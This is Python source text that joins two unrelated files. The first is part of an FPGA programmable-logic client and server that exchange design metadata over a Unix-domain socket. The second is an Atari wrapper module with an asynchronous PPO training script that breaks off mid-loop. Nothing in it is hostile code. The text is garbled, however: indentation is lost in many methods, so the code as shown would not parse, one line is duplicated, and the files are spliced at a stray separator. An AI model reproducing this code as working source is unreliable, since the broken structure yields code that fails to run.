        self._timestamp = timestamp
    if bitfile_name is not None:
        self._bitfile_name = bitfile_name
    self.server_update()
def clear_dict(self):
"""Clear all the dictionaries stored in PL.
This method will clear all the related dictionaries, including IP
dictionary, GPIO dictionary, etc.
"""
self._ip_dict.clear()
self._gpio_dict.clear()
self._interrupt_controllers.clear()
self._interrupt_pins.clear()
self._hierarchy_dict.clear()
self._mem_dict.clear()
    def load_ip_data(self, ip_name, data):
        """This method writes data to the addressable IP.

        Note
        ----
        The data is assumed to be in binary format (.bin). The data
        name will be stored as a state information in the IP dictionary.
        Only the bookkeeping happens here: this method records *which* data
        file was loaded; nothing is written to hardware in this method.

        Parameters
        ----------
        ip_name : str
            The name of the addressable IP.
        data : str
            The absolute path of the data to be loaded.

        Returns
        -------
        None
        """
        self.client_request()
        self._ip_dict[ip_name]['state'] = data
        self.server_update()
    def update_partial_region(self, hier, parser):
        """Merge the parser information from partial region.

        Combine the currently PL information and the partial HWH file
        parsing results, updating the IP, GPIO, interrupt-pin and hierarchy
        dictionaries in that order.

        Parameters
        ----------
        hier : str
            The name of the hierarchical block as the partial region.
        parser : HWH
            A parser object for the partial region.
        """
        self.client_request()
        # Each helper rebuilds one dictionary from the PR parser's view.
        self._update_pr_ip(parser, hier)
        self._update_pr_gpio(parser)
        self._update_pr_intr_pins(parser)
        self._update_pr_hier(hier)
        self.server_update()
    def _update_pr_ip(self, parser, hier):
        """Rebuild the IP dictionary for a partially reconfigured region.

        Drops the old entries under `hier` (except `s_axi_control` ones) and
        re-adds the parser's IPs, rebasing their physical addresses on the
        parent IP's base address.
        """
        merged_ip_dict = deepcopy(self._ip_dict)
        # NOTE(review): exact-type check rejects HWH subclasses; consider
        # isinstance() if subclassed parsers are ever expected.
        if type(parser) is HWH:
            # Iterate over a copy since entries are popped during the loop.
            for k in merged_ip_dict.copy():
                if k.startswith(hier) and 's_axi_control' not in k:
                    merged_ip_dict.pop(k)
            for k, v in parser.ip_dict.items():
                # Parent entry is "<toplevel>/<mem_id>" in the full design.
                parent = k.split('/')[0] + '/' + v['mem_id']
                if parent in self._ip_dict:
                    ip_name = v['fullpath']
                    merged_ip_dict[ip_name] = dict()
                    merged_ip_dict[ip_name]['fullpath'] = v['fullpath']
                    merged_ip_dict[ip_name]['parameters'] = v['parameters']
                    # PR addresses are relative; rebase onto the parent.
                    merged_ip_dict[ip_name]['phys_addr'] = \
                        self._ip_dict[parent]['phys_addr'] + v['phys_addr']
                    merged_ip_dict[ip_name]['addr_range'] = v['addr_range']
                    merged_ip_dict[ip_name]['registers'] = v['registers']
                    merged_ip_dict[ip_name]['state'] = None
                    merged_ip_dict[ip_name]['type'] = v['type']
                    merged_ip_dict[ip_name]['gpio'] = {}
                    merged_ip_dict[ip_name]['interrupts'] = {}
                    merged_ip_dict[ip_name]['mem_id'] = v['mem_id']
        else:
            raise ValueError("Cannot find HWH PR region parser.")
        self._ip_dict = merged_ip_dict
    def _update_pr_gpio(self, parser):
        """Merge partial-region net info into the GPIO dictionary."""
        new_gpio_dict = dict()
        for k, v in self._gpio_dict.items():
            for pin in v['pins']:
                if pin in parser.pins:
                    # In-place dict merge (requires Python 3.9+).
                    # NOTE(review): assumes parser.nets values are dict-like
                    # here -- verify against the HWH parser implementation.
                    v |= parser.nets[parser.pins[pin]]
            new_gpio_dict[k] = v
        self._gpio_dict = new_gpio_dict
def _update_pr_intr_pins(self, parser):
new_interrupt_pins = dict()
for k, v in self._interrupt_pins.items():
if k in parser.pins:
net_set = parser.nets[parser.pins[k]]
hier_map = {i.count('/'): i for i in net_set}
hier_map = sorted(hier_map.items(), reverse=True)
fullpath = hier_map[0][-1]
new_interrupt_pins[fullpath] = deepcopy(v)
new_interrupt_pins[fullpath]['fullpath'] = fullpath
else:
new_interrupt_pins[k] = v
self._interrupt_pins = new_interrupt_pins
def _update_pr_hier(self, hier):
self._hierarchy_dict[hier] = {
'ip': dict(),
'hierarchies': dict(),
'interrupts': dict(),
'gpio': dict(),
'fullpath': hier,
'memories': dict()
}
for name, val in self._ip_dict.items():
hier, _, ip = name.rpartition('/')
if hier:
self._hierarchy_dict[hier]['ip'][ip] = val
self._hierarchy_dict[hier]['ip'][ip] = val
for name, val in self._hierarchy_dict.items():
hier, _, subhier = name.rpartition('/')
if hier:
self._hierarchy_dict[hier]['hierarchies'][subhier] = val
for interrupt, val in self._interrupt_pins.items():
block, _, pin = interrupt.rpartition('/')
if block in self._ip_dict:
self._ip_dict[block]['interrupts'][pin] = val
if block in self._hierarchy_dict:
self._hierarchy_dict[block]['interrupts'][pin] = val
for gpio in self._gpio_dict.values():
for connection in gpio['pins']:
ip, _, pin = connection.rpartition('/')
if ip in self._ip_dict:
self._ip_dict[ip]['gpio'][pin] = gpio
elif ip in self._hierarchy_dict:
self._hierarchy_dict[ip]['gpio'][pin] = gpio
def clear_devicetree(self):
"""Clear the device tree dictionary.
This should be used when downloading the full bitstream, where all the
dtbo are cleared from the system.
"""
for i in self._devicetree_dict:
self._devicetree_dict[i].remove()
def insert_device_tree(cls, abs_dtbo):
"""Insert device tree segment.
For device tree segments associated with full / partial bitstreams,
users can provide the relative or absolute paths of the dtbo files.
Parameters
----------
abs_dtbo : str
The absolute path to the device tree segment.
"""
cls.client_request()
dtbo_base_name = get_dtbo_base_name(abs_dtbo)
cls._devicetree_dict[dtbo_base_name] = DeviceTreeSegment(abs_dtbo)
cls._devicetree_dict[dtbo_base_name].remove()
cls._devicetree_dict[dtbo_base_name].insert()
cls.server_update()
def remove_device_tree(cls, abs_dtbo):
"""Remove device tree segment for the overlay.
Parameters
----------
abs_dtbo : str
The absolute path to the device tree segment.
"""
cls.client_request()
dtbo_base_name = get_dtbo_base_name(abs_dtbo)
cls._devicetree_dict[dtbo_base_name].remove()
del cls._devicetree_dict[dtbo_base_name]
cls.server_update()
    def client_request(self):
        """Client connects to the PL server and receives the attributes.

        This method should not be used by the users directly. It opens a
        connection to the server's Unix-domain socket (authenticated with
        this object's key) and receives the complete state payload; call
        `server_update()` afterwards to push the (possibly modified) state
        back and close the connection.

        To check open pipes in the system, use `lsof | grep <address>` and
        `kill -9 <pid>` to manually delete them.

        Returns
        -------
        None
        """
        try:
            self._remote = Client(self._address, family='AF_UNIX',
                                  authkey=self._key)
        except FileNotFoundError:
            # The socket file does not exist: no PL server is running.
            raise ConnectionError(
                "Could not connect to PL server") from None
        # The field order must match exactly what the server sends.
        self._bitfile_name, self._timestamp, \
            self._ip_dict, self._gpio_dict, \
            self._interrupt_controllers, \
            self._interrupt_pins, \
            self._hierarchy_dict, \
            self._devicetree_dict, \
            self._mem_dict = self._remote.recv()
def server_update(self, continued=1):
self._remote.send([self._bitfile_name,
self._timestamp,
self._ip_dict,
self._gpio_dict,
self._interrupt_controllers,
self._interrupt_pins,
self._hierarchy_dict,
self._devicetree_dict,
self._mem_dict,
continued])
self._remote.close()
pass
class DeviceServer:
    """Class to provide an instance of the PL server.

    A thread owns the canonical copy of the PL metadata (bitfile name,
    timestamp, and the design dictionaries) and exchanges it with one
    authenticated client connection at a time over a Unix-domain socket.
    """
    def __init__(self, tag, key=b'xilinx'):
        self.tag = tag
        # One socket path per device, derived from the device tag.
        self.socket_name = PL_SERVER_TEMPLATE.format(tag)
        self.key = key
        self.thread = threading.Thread(target=self.server_proc)
        # State payload, in the exact order the client protocol expects.
        self._data = [
            "",  # Bitfile name
            None,  # Timestamp
            dict(),  # IP Dict
            dict(),  # GPIO Dict
            dict(),  # Interrupt Dict
            dict(),  # Interrupt Pin Dict
            dict(),  # Hierarchy Dict
            dict(),  # Devicetree dict
            dict()  # Memory Dict
        ]
        self._started = threading.Event()
    def start(self, daemonize=True):
        # Block until server_proc has opened its listener, so a client
        # created right after start() returns can connect successfully.
        self.thread.daemon = daemonize
        self.thread.start()
        self._started.wait()
    def server_proc(self):
        # Remove a stale socket left behind by a previous (crashed) server.
        if os.path.exists(self.socket_name):
            os.remove(self.socket_name)
        server = Listener(self.socket_name, family='AF_UNIX', authkey=self.key)
        self._started.set()
        status = True
        while status:
            # One full request/response exchange per client connection:
            # send current state, receive updated state + continued flag.
            client = server.accept()
            client.send(self._data)
            new_data = client.recv()
            self._data = new_data[0:-1]
            # Last element is the 'continued' flag; 0 ends the serve loop.
            status = new_data[-1]
            client.close()
        server.close()
        if os.path.exists(self.socket_name):
            os.remove(self.socket_name)
    def stop(self, wait_for_thread=True):
        # Shut the server down by acting as a client that sends continued=0.
        client = DeviceClient(self.tag, self.key)
        client.client_request()
        client.server_update(0)
        if wait_for_thread:
            self.thread.join()
def _start_server():
    """Launch a PL server for every known device and block until they exit.

    Servers are started non-daemonized so the process stays alive while
    they serve; all server threads are then joined.
    """
    from .device import Device
    Device.start_global = True
    servers = [DeviceServer(device.tag) for device in Device.devices]
    # Bring every server up first...
    for server in servers:
        server.start(False)
    # ...then wait on each server thread.
    for server in servers:
        server.thread.join()
def _stop_server():
    """Ask every device's PL server to shut down.

    This is called from a separate process, so the server threads were
    never started here; ``stop(False)`` skips joining them.
    """
    from .device import Device
    Device.start_global = True
    for device in Device.devices:
        DeviceServer(device.tag).stop(False)
|
profiled_async_ppo_atari_visual.py | # https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
# Disable OpenCV's OpenCL acceleration so all cv2 frame operations run on
# the CPU (avoids GPU/driver surprises in worker processes).
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
    def __init__(self, env, noop_max=30):
        """Sample initial states by taking random number of no-ops on reset.
        No-op is assumed to be action 0.
        """
        gym.Wrapper.__init__(self, env)
        self.noop_max = noop_max
        # Tests can pin the exact number of no-ops via this attribute.
        self.override_num_noops = None
        self.noop_action = 0
        assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
    def reset(self, **kwargs):
        """ Do no-op action for a number of steps in [1, noop_max]."""
        self.env.reset(**kwargs)
        if self.override_num_noops is not None:
            noops = self.override_num_noops
        else:
            noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
        assert noops > 0
        obs = None
        for _ in range(noops):
            obs, _, done, _ = self.env.step(self.noop_action)
            if done:
                # Episode ended during the no-ops: restart and keep stepping.
                obs = self.env.reset(**kwargs)
        return obs
    def step(self, ac):
        return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
    def __init__(self, env):
        """Take action on reset for environments that are fixed until firing."""
        gym.Wrapper.__init__(self, env)
        assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
        assert len(env.unwrapped.get_action_meanings()) >= 3
    def reset(self, **kwargs):
        self.env.reset(**kwargs)
        # Press FIRE (action 1) and then action 2; if either step terminates
        # the episode, reset again so play can begin.
        obs, _, done, _ = self.env.step(1)
        if done:
            self.env.reset(**kwargs)
        obs, _, done, _ = self.env.step(2)
        if done:
            # NOTE(review): the observation from this reset is discarded and
            # the pre-reset `obs` is returned -- confirm this is intended.
            self.env.reset(**kwargs)
        return obs
    def step(self, ac):
        return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
    def __init__(self, env):
        """Make end-of-life == end-of-episode, but only reset on true game over.
        Done by DeepMind for the DQN and co. since it helps value estimation.
        """
        gym.Wrapper.__init__(self, env)
        self.lives = 0
        # True when the underlying env itself reported done (real game over).
        self.was_real_done = True
    def step(self, action):
        obs, reward, done, info = self.env.step(action)
        self.was_real_done = done
        # check current lives, make loss of life terminal,
        # then update lives to handle bonus lives
        lives = self.env.unwrapped.ale.lives()
        if lives < self.lives and lives > 0:
            # for Qbert sometimes we stay in lives == 0 condition for a few frames
            # so it's important to keep lives > 0, so that we only reset once
            # the environment advertises done.
            done = True
        self.lives = lives
        return obs, reward, done, info
    def reset(self, **kwargs):
        """Reset only when lives are exhausted.
        This way all states are still reachable even though lives are episodic,
        and the learner need not know about any of this behind-the-scenes.
        """
        if self.was_real_done:
            obs = self.env.reset(**kwargs)
        else:
            # no-op step to advance from terminal/lost life state
            obs, _, _, _ = self.env.step(0)
        self.lives = self.env.unwrapped.ale.lives()
        return obs
class MaxAndSkipEnv(gym.Wrapper):
    def __init__(self, env, skip=4):
        """Return only every `skip`-th frame"""
        gym.Wrapper.__init__(self, env)
        # most recent raw observations (for max pooling across time steps)
        self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
        self._skip = skip
    def step(self, action):
        """Repeat action, sum reward, and max over last observations."""
        total_reward = 0.0
        done = None
        for i in range(self._skip):
            obs, reward, done, info = self.env.step(action)
            # Only the last two raw frames are kept for the max-pool below.
            if i == self._skip - 2: self._obs_buffer[0] = obs
            if i == self._skip - 1: self._obs_buffer[1] = obs
            total_reward += reward
            if done:
                break
        # Note that the observation on the done=True frame
        # doesn't matter
        max_frame = self._obs_buffer.max(axis=0)
        return max_frame, total_reward, done, info
    def reset(self, **kwargs):
        return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
    """Reward wrapper that keeps only the sign of each reward."""

    def __init__(self, env):
        super().__init__(env)

    def reward(self, reward):
        """Bin reward to {+1, 0, -1} by its sign."""
        return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
    def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
        """
        Warp frames to 84x84 as done in the Nature paper and later work.
        If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
        observation should be warped.
        """
        super().__init__(env)
        self._width = width
        self._height = height
        self._grayscale = grayscale
        self._key = dict_space_key
        if self._grayscale:
            num_colors = 1
        else:
            num_colors = 3
        new_space = gym.spaces.Box(
            low=0,
            high=255,
            shape=(self._height, self._width, num_colors),
            dtype=np.uint8,
        )
        if self._key is None:
            original_space = self.observation_space
            self.observation_space = new_space
        else:
            # Only the selected sub-space of the Dict space is replaced.
            original_space = self.observation_space.spaces[self._key]
            self.observation_space.spaces[self._key] = new_space
        # The wrapped space must be a 3-D uint8 image.
        assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
    def observation(self, obs):
        if self._key is None:
            frame = obs
        else:
            frame = obs[self._key]
        if self._grayscale:
            frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
        frame = cv2.resize(
            frame, (self._width, self._height), interpolation=cv2.INTER_AREA
        )
        if self._grayscale:
            # Restore the channel axis dropped by cvtColor.
            frame = np.expand_dims(frame, -1)
        if self._key is None:
            obs = frame
        else:
            # Copy so the caller's dict observation is not mutated.
            obs = obs.copy()
            obs[self._key] = frame
        return obs
class FrameStack(gym.Wrapper):
    def __init__(self, env, k):
        """Stack k last frames.
        Returns lazy array, which is much more memory efficient.
        See Also
        --------
        baselines.common.atari_wrappers.LazyFrames
        """
        gym.Wrapper.__init__(self, env)
        self.k = k
        # Bounded deque drops the oldest frame automatically.
        self.frames = deque([], maxlen=k)
        shp = env.observation_space.shape
        # Stacking multiplies the last (channel) dimension by k.
        self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
    def reset(self):
        ob = self.env.reset()
        # Fill the stack with k copies of the first observation.
        for _ in range(self.k):
            self.frames.append(ob)
        return self._get_ob()
    def step(self, action):
        ob, reward, done, info = self.env.step(action)
        self.frames.append(ob)
        return self._get_ob(), reward, done, info
    def _get_ob(self):
        assert len(self.frames) == self.k
        return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
    """Rescale uint8 pixel observations to float32 values in [0, 1]."""

    def __init__(self, env):
        super().__init__(env)
        self.observation_space = gym.spaces.Box(
            low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)

    def observation(self, observation):
        # Careful! This undoes the LazyFrames memory optimization; use it
        # only with smaller replay buffers.
        return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
    """Memory-saving view over a list of frames.

    Frames shared between successive observations are stored only once; the
    concatenated array is materialized lazily on first access and cached.
    Convert to a numpy array only right before feeding the model.
    """

    def __init__(self, frames):
        self._frames = frames
        self._out = None

    def _force(self):
        # Materialize (and cache) the concatenation, then drop the frame
        # list so the memory is not held twice.
        if self._out is None:
            self._out = np.concatenate(self._frames, axis=-1)
            self._frames = None
        return self._out

    def __array__(self, dtype=None):
        out = self._force()
        return out if dtype is None else out.astype(dtype)

    def __len__(self):
        return len(self._force())

    def __getitem__(self, i):
        return self._force()[i]

    def count(self):
        # Number of stacked frames = size of the last (channel) axis.
        stacked = self._force()
        return stacked.shape[-1]

    def frame(self, i):
        return self._force()[..., i]
def wrap_atari(env, max_episode_steps=None):
    """Apply the base Atari wrappers: random no-op resets + 4-frame skip."""
    assert 'NoFrameskip' in env.spec.id
    wrapped = NoopResetEnv(env, noop_max=30)
    wrapped = MaxAndSkipEnv(wrapped, skip=4)
    # Episode time limits are not supported by this wrapper chain.
    assert max_episode_steps is None
    return wrapped
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
    """Configure environment for DeepMind-style Atari.

    Wrapping order matters: life-episode and FIRE-reset wrap the raw env,
    then frames are warped, optionally float-scaled, rewards clipped, and
    frames stacked last.
    """
    wrapped = EpisodicLifeEnv(env) if episode_life else env
    if 'FIRE' in wrapped.unwrapped.get_action_meanings():
        wrapped = FireResetEnv(wrapped)
    wrapped = WarpFrame(wrapped)
    if scale:
        wrapped = ScaledFloatFrame(wrapped)
    if clip_rewards:
        wrapped = ClipRewardEnv(wrapped)
    if frame_stack:
        wrapped = FrameStack(wrapped, 4)
    return wrapped
class ImageToPyTorch(gym.ObservationWrapper):
    """Convert HWC image observations to PyTorch's CHW layout."""

    def __init__(self, env):
        super(ImageToPyTorch, self).__init__(env)
        prev_shape = self.observation_space.shape
        self.observation_space = gym.spaces.Box(
            low=0,
            high=255,
            shape=(prev_shape[-1], prev_shape[0], prev_shape[1]),
            dtype=np.uint8,
        )

    def observation(self, observation):
        # Move the channel axis to the front.
        return np.transpose(observation, axes=(2, 0, 1))
def wrap_pytorch(env):
    """Wrap *env* so its image observations are channel-first for PyTorch."""
    return ImageToPyTorch(env)
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
from torch.utils.tensorboard import SummaryWriter
import argparse
from distutils.util import strtobool
import numpy as np
import gym
from gym.wrappers import TimeLimit, Monitor
import pybullet_envs
from gym.spaces import Discrete, Box, MultiBinary, MultiDiscrete, Space
import time
import random
import os
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
from torch import multiprocessing as mp
from faster_fifo import Queue as FastQueue
from queue import Full, Empty
from multiprocessing.shared_memory import SharedMemory
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import stopwatch
class SharedNDArray(np.ndarray):
    """ndarray view backed by a ``multiprocessing`` SharedMemory block.

    Keeps a reference to the backing segment so the array owner can close
    or unlink the shared memory when consumers are done with the data.
    """

    def set_shm(self, shm):
        # ndarray subclasses cannot easily take extra constructor args,
        # hence this explicit setter for the backing segment.
        self.shm = shm

    def close(self):
        self.shm.close()

    def unlink(self):
        self.shm.unlink()
def share_memory(arr):
    """Copy *arr* into a new ``SharedNDArray`` backed by shared memory."""
    segment = SharedMemory(create=True, size=arr.nbytes)
    shared = SharedNDArray(arr.shape, dtype=arr.dtype, buffer=segment.buf)
    shared[:] = arr[:]
    shared.set_shm(segment)
    return shared
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='PPO agent')
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(".py"),
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="BreakoutNoFrameskip-v4",
help='the id of the gym environment')
parser.add_argument('--learning-rate', type=float, default=2.5e-4,
help='the learning rate of the optimizer')
parser.add_argument('--seed', type=int, default=1,
help='seed of the experiment')
parser.add_argument('--total-timesteps', type=int, default=1000000,
help='total timesteps of the experiments')
parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, `torch.backends.cudnn.deterministic=False`')
parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, cuda will not be enabled by default')
parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='run the script in production mode and use wandb to log outputs')
parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='weather to capture videos of the agent performances (check out `videos` folder)')
parser.add_argument('--wandb-project-name', type=str, default="cleanRL",
help="the wandb's project name")
parser.add_argument('--wandb-entity', type=str, default=None,
help="the entity (team) of wandb's project")
# Algorithm specific arguments
parser.add_argument('--num-rollout-workers', type=int, default=4,
help='the number of rollout workers')
parser.add_argument('--n-minibatch', type=int, default=4,
help='the number of mini batch')
parser.add_argument('--num-envs', type=int, default=8,
help='the number of parallel game environment')
parser.add_argument('--num-steps', type=int, default=128,
help='the number of steps per game environment')
parser.add_argument('--gamma', type=float, default=0.99,
help='the discount factor gamma')
parser.add_argument('--gae-lambda', type=float, default=0.95,
help='the lambda for the general advantage estimation')
parser.add_argument('--ent-coef', type=float, default=0.01,
help="coefficient of the entropy")
parser.add_argument('--vf-coef', type=float, default=0.5,
help="coefficient of the value function")
parser.add_argument('--max-grad-norm', type=float, default=0.5,
help='the maximum norm for the gradient clipping')
parser.add_argument('--clip-coef', type=float, default=0.1,
help="the surrogate clipping coefficient")
parser.add_argument('--update-epochs', type=int, default=4,
help="the K epochs to update the policy")
parser.add_argument('--kle-stop', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will be early stopped w.r.t target-kl')
parser.add_argument('--kle-rollback', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will roll back to previous policy if KL exceeds target-kl')
parser.add_argument('--target-kl', type=float, default=0.03,
help='the target-kl variable that is referred by --kl')
parser.add_argument('--gae', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Use GAE for advantage computation')
parser.add_argument('--norm-adv', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggles advantages normalization")
parser.add_argument('--anneal-lr', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggle learning rate annealing for policy and value networks")
parser.add_argument('--clip-vloss', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Toggles wheter or not to use a clipped loss for the value function, as per the paper.')
args = parser.parse_args()
if not args.seed:
args.seed = int(time.time())
args.batch_size = int(args.num_envs * args.num_steps)
args.minibatch_size = int(args.batch_size // args.n_minibatch)
# TRY NOT TO MODIFY: setup the environment
experiment_name = f"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}"
writer = SummaryWriter(f"runs/{experiment_name}")
writer.add_text('hyperparameters', "|param|value|\n|-|-|\n%s" % (
'\n'.join([f"|{key}|{value}|" for key, value in vars(args).items()])))
if args.prod_mode:
import wandb
wandb.init(project=args.wandb_project_name, entity=args.wandb_entity, sync_tensorboard=True, config=vars(args), name=experiment_name, monitor_gym=True, save_code=True)
writer = SummaryWriter(f"/tmp/{experiment_name}")
# TRY NOT TO MODIFY: seeding
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = args.torch_deterministic
    def make_env(gym_id, seed, idx):
        # Returns a thunk that builds one fully-wrapped, seeded Atari env.
        # NOTE: the thunk closes over `args` and `experiment_name` from the
        # enclosing script scope.
        def thunk():
            env = gym.make(gym_id)
            env = wrap_atari(env)
            # Record episode returns/lengths before reward clipping below.
            env = gym.wrappers.RecordEpisodeStatistics(env)
            if args.capture_video:
                if idx == 0:
                    env = Monitor(env, f'videos/{experiment_name}')
            env = wrap_pytorch(
                wrap_deepmind(
                    env,
                    clip_rewards=True,
                    frame_stack=True,
                    scale=False,
                )
            )
            env.seed(seed)
            env.action_space.seed(seed)
            env.observation_space.seed(seed)
            return env
        return thunk
envs = DummyVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)])
# if args.prod_mode:
# envs = VecPyTorch(
# SubprocVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)], "fork"),
# device
# )
assert isinstance(envs.action_space, Discrete), "only discrete action space is supported"
# ALGO LOGIC: initialize agent here:
class Scale(nn.Module):
def __init__(self, scale):
super().__init__()
self.scale = scale
def forward(self, x):
return x * self.scale
def layer_init(layer, std=np.sqrt(2), bias_const=0.0):
torch.nn.init.orthogonal_(layer.weight, std)
torch.nn.init.constant_(layer.bias, bias_const)
return layer
    class Agent(nn.Module):
        """Actor-critic with a shared convolutional trunk for Atari frames."""
        def __init__(self, envs, frames=4):
            super(Agent, self).__init__()
            self.network = nn.Sequential(
                Scale(1/255),
                layer_init(nn.Conv2d(frames, 32, 8, stride=4)),
                nn.ReLU(),
                layer_init(nn.Conv2d(32, 64, 4, stride=2)),
                nn.ReLU(),
                layer_init(nn.Conv2d(64, 64, 3, stride=1)),
                nn.ReLU(),
                nn.Flatten(),
                # 3136 = 64 * 7 * 7 flattened features for 84x84 inputs.
                layer_init(nn.Linear(3136, 512)),
                nn.ReLU()
            )
            # Small init std for the policy head, unit std for the value head.
            self.actor = layer_init(nn.Linear(512, envs.action_space.n), std=0.01)
            self.critic = layer_init(nn.Linear(512, 1), std=1)
        def forward(self, x):
            return self.network(x)
        def get_action(self, x, action=None):
            # When `action` is provided, only its log-prob/entropy are
            # evaluated (no sampling) -- used during the PPO update epochs.
            logits = self.actor(self.forward(x))
            probs = Categorical(logits=logits)
            if action is None:
                action = probs.sample()
            return action, probs.log_prob(action), probs.entropy()
        def get_value(self, x):
            return self.critic(self.forward(x))
    agent = Agent(envs).to(device)
    optimizer = optim.Adam(agent.parameters(), lr=args.learning_rate, eps=1e-5)
    if args.anneal_lr:
        # https://github.com/openai/baselines/blob/ea25b9e8b234e6ee1bca43083f8f3cf974143998/baselines/ppo2/defaults.py#L20
        lr = lambda f: f * args.learning_rate
    # ALGO Logic: Storage for epoch data
    # All rollout buffers live in shared memory so the rollout worker
    # processes can read/write them directly (see AsyncEnvs below).
    obs = share_memory(np.zeros((args.num_steps, args.num_envs) + envs.observation_space.shape, dtype=np.float32))
    actions = share_memory(np.zeros((args.num_steps, args.num_envs) + envs.action_space.shape, dtype=envs.action_space.dtype))
    logprobs = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
    rewards = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
    dones = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
    values = share_memory(np.zeros((args.num_steps, args.num_envs), dtype=np.float32))
    # TRY NOT TO MODIFY: start the game
    global_step = 0
    # Note how `next_obs` and `next_done` are used; their usage is equivalent to
    # https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/84a7582477fb0d5c82ad6d850fe476829dddd2e1/a2c_ppo_acktr/storage.py#L60
    next_obs = share_memory(np.zeros((args.num_envs,)+envs.observation_space.shape, dtype=np.float32))
    next_done = share_memory(np.zeros(args.num_envs, dtype=np.float32))
    num_updates = args.total_timesteps // args.batch_size
    class AsyncEnvs:
        """Runs env rollouts in worker processes.

        Workers step their slice of envs whenever the main process has
        written an action for them; coordination happens through per-worker
        task queues, a shared policy-request queue, a stats queue, and the
        shared-memory storage buffers.
        """
        def __init__(self, env_fns, num_rollout_workers, num_steps, device, agent,
                     storage):
            self.envs = [env_fn() for env_fn in env_fns]
            self.num_rollout_workers = num_rollout_workers
            self.num_steps = num_steps
            self.device = device
            self.agent = agent
            # ctx = mp.get_context("fork")
            # One task queue per worker; stats/policy-request queues shared.
            self.rollout_task_queues = [FastQueue(1000) for i in range(num_rollout_workers)]
            self.stats_queue = FastQueue(1000)
            self.policy_request_queue = FastQueue(1000)
            self.storage = storage
            assert len(env_fns) % self.num_rollout_workers == 0, \
                "number of rollout workers must divide the number of envs"
            self.num_envs_per_rollout_worker = len(env_fns) // self.num_rollout_workers
            for rollout_worker_idx in range(self.num_rollout_workers):
                mp.Process(target=self.start_rollout_worker, args=(rollout_worker_idx,)).start()
        def start_rollout_worker(self, rollout_worker_idx):
            # Worker process body. `storage` unpacks to the shared buffers
            # created in the main script.
            sw = stopwatch.StopWatch()
            next_obs, next_done, obs, actions, logprobs, rewards, dones, values = self.storage
            env_idxs = range(rollout_worker_idx*self.num_envs_per_rollout_worker,
                             rollout_worker_idx*self.num_envs_per_rollout_worker+self.num_envs_per_rollout_worker)
            for env_idx in env_idxs:
                # Seed the pipeline: request the first action for each env.
                next_step = 0
                self.policy_request_queue.put([next_step, env_idx, rollout_worker_idx])
                next_obs[env_idx] = torch.tensor(self.envs[env_idx].reset())
                next_done[env_idx] = 0
            local_step = 0
            while True:
                with sw.timer('act'):
                    with sw.timer('wait_rollout_task_queue'):
                        tasks = self.rollout_task_queues[rollout_worker_idx].get_many()
                    with sw.timer('rollouts'):
                        # print(tasks)
                        for task in tasks:
                            # A task is (step, env_idx): the main process has
                            # written actions[step, env_idx]; step the env.
                            step, env_idx = task
                            obs[step,env_idx] = next_obs[env_idx].copy()
                            dones[step,env_idx] = next_done[env_idx].copy()
                            next_obs[env_idx], r, d, info = self.envs[env_idx].step(actions[step,env_idx])
                            if d:
                                next_obs[env_idx] = self.envs[env_idx].reset()
                            rewards[step,env_idx] = r
                            next_done[env_idx] = d
                            next_step = step + 1
                            local_step += 1
                            with sw.timer('logging'):
                                # Request the next action for this env.
                                self.policy_request_queue.put([next_step, env_idx, rollout_worker_idx])
                                if 'episode' in info.keys():
                                    # print(["charts/episode_reward", info['episode']['r']])
                                    self.stats_queue.put(['l', info['episode']['l']])
